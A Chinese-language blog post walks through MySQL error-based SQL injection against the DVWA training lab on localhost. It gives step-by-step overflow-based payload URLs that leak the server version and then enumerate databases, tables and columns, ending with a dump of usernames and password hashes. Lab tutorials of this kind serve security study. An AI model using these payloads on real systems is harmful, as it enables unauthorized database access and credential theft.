最新消息:

mysql新型报错注入实例

MySQL注入 admin 1488浏览 0评论

使用DVWA的第一关作为例子讲解一下mysql的新型注入。

第一关链接:http://localhost:8080/dvwa/vulnerabilities/sqli/?id=1&Submit=%C8%B7%B6%A8# ,参数id存在注入

20140630214111

http://localhost:8080/dvwa/vulnerabilities/sqli/?id=1’&Submit=%C8%B7%B6%A8#

20140630214145
可以看到将id参数设为1’时报错了,该处存在mysql的字符型报错注入。下面讲解一下具体如何使用mysql新型报错注入来获取信息。

1、判断是否存在新型报错注入

http://localhost:8080/dvwa/vulnerabilities/sqli/?id=1' and 18446744073709551610*2 and '1'='1&Submit=%C8%B7%B6%A8#

20140630214616

可以看到注入点数据库存在新型报错注入。

2、获取version等信息,如version(),user(),database()等

http://localhost:8080/dvwa/vulnerabilities/sqli/?id=1' and (select!x-~0.FROM(select+version()x)f) and '1'='1&Submit=%C8%B7%B6%A8#

20140630221841

 3、暴库

http://localhost:8080/dvwa/vulnerabilities/sqli/?id=1' and (select!x-~0.FROM(select group_concat(SCHEMA_NAME)x from information_schema.SCHEMATA)f)and '1'='1&Submit=%C8%B7%B6%A8#

20140630222336

4、爆表

http://localhost:8080/dvwa/vulnerabilities/sqli/?id=1' and (select!x-~0.FROM(select group_concat(TABLE_NAME)x from information_schema.TABLES where TABLE_SCHEMA='dvwa')f)and '1'='1&Submit=%C8%B7%B6%A8#

20140630223039

5、爆列

http://localhost:8080/dvwa/vulnerabilities/sqli/?id=1' and (select!x-~0.FROM(select group_concat(COLUMN_NAME)x from information_schema.COLUMNS where TABLE_NAME='users')f)and '1'='1&Submit=%C8%B7%B6%A8#

20140630223305

6、爆数据

http://localhost:8080/dvwa/vulnerabilities/sqli/?id=1' and (select!x-~0.FROM(select group_concat(user,':',password)x from dvwa.users)f)and '1'='1&Submit=%C8%B7%B6%A8#

20140630223535

 

———————————————————————————————————————

下面是测试时的其他语句,不过没有上面那么简洁,使用时使用上面的语句即可。

获取version信息

http://localhost:8080/dvwa/vulnerabilities/sqli/?id=1' and 1E308*if((select*from(select version())x),2,2) and '1'='1&Submit=%C8%B7%B6%A8#

20140630214923

暴库

http://localhost:8080/dvwa/vulnerabilities/sqli/?id=1' and  1E308*if((select SCHEMA_NAME from(select *from information_schema.SCHEMATA LIMIT 0,1)a limit 1),2,2) and '1'='1&Submit=%C8%B7%B6%A8#

20140630220538
20140630220603

20140630220629

只要不断改变上面的limit后面的参数,就可以把所有的库爆出来。

爆表

http://localhost:8080/dvwa/vulnerabilities/sqli/?id=1' and  1E308*if((select TABLE_NAME from(select * from information_schema.TABLES where TABLE_SCHEMA='dvwa' limit 1,1)a limit 1),2,2) and '1'='1&Submit=%C8%B7%B6%A8#

20140630221252

和上面爆库一样,只要不断改变limit后面的数值就可以爆出所有的表。

 

参考资料:

1、http://www.jinglingshu.org/?p=7343

2、http://www.myhack58.com/Article/html/3/7/2011/30958.htm

 

转载请注明:jinglingshu的博客 » mysql新型报错注入实例


Warning: Use of undefined constant PRC - assumed 'PRC' (this will throw an Error in a future version of PHP) in /usr/share/nginx/html/wp-content/themes/d8/comments.php on line 17
发表我的评论
取消评论

表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址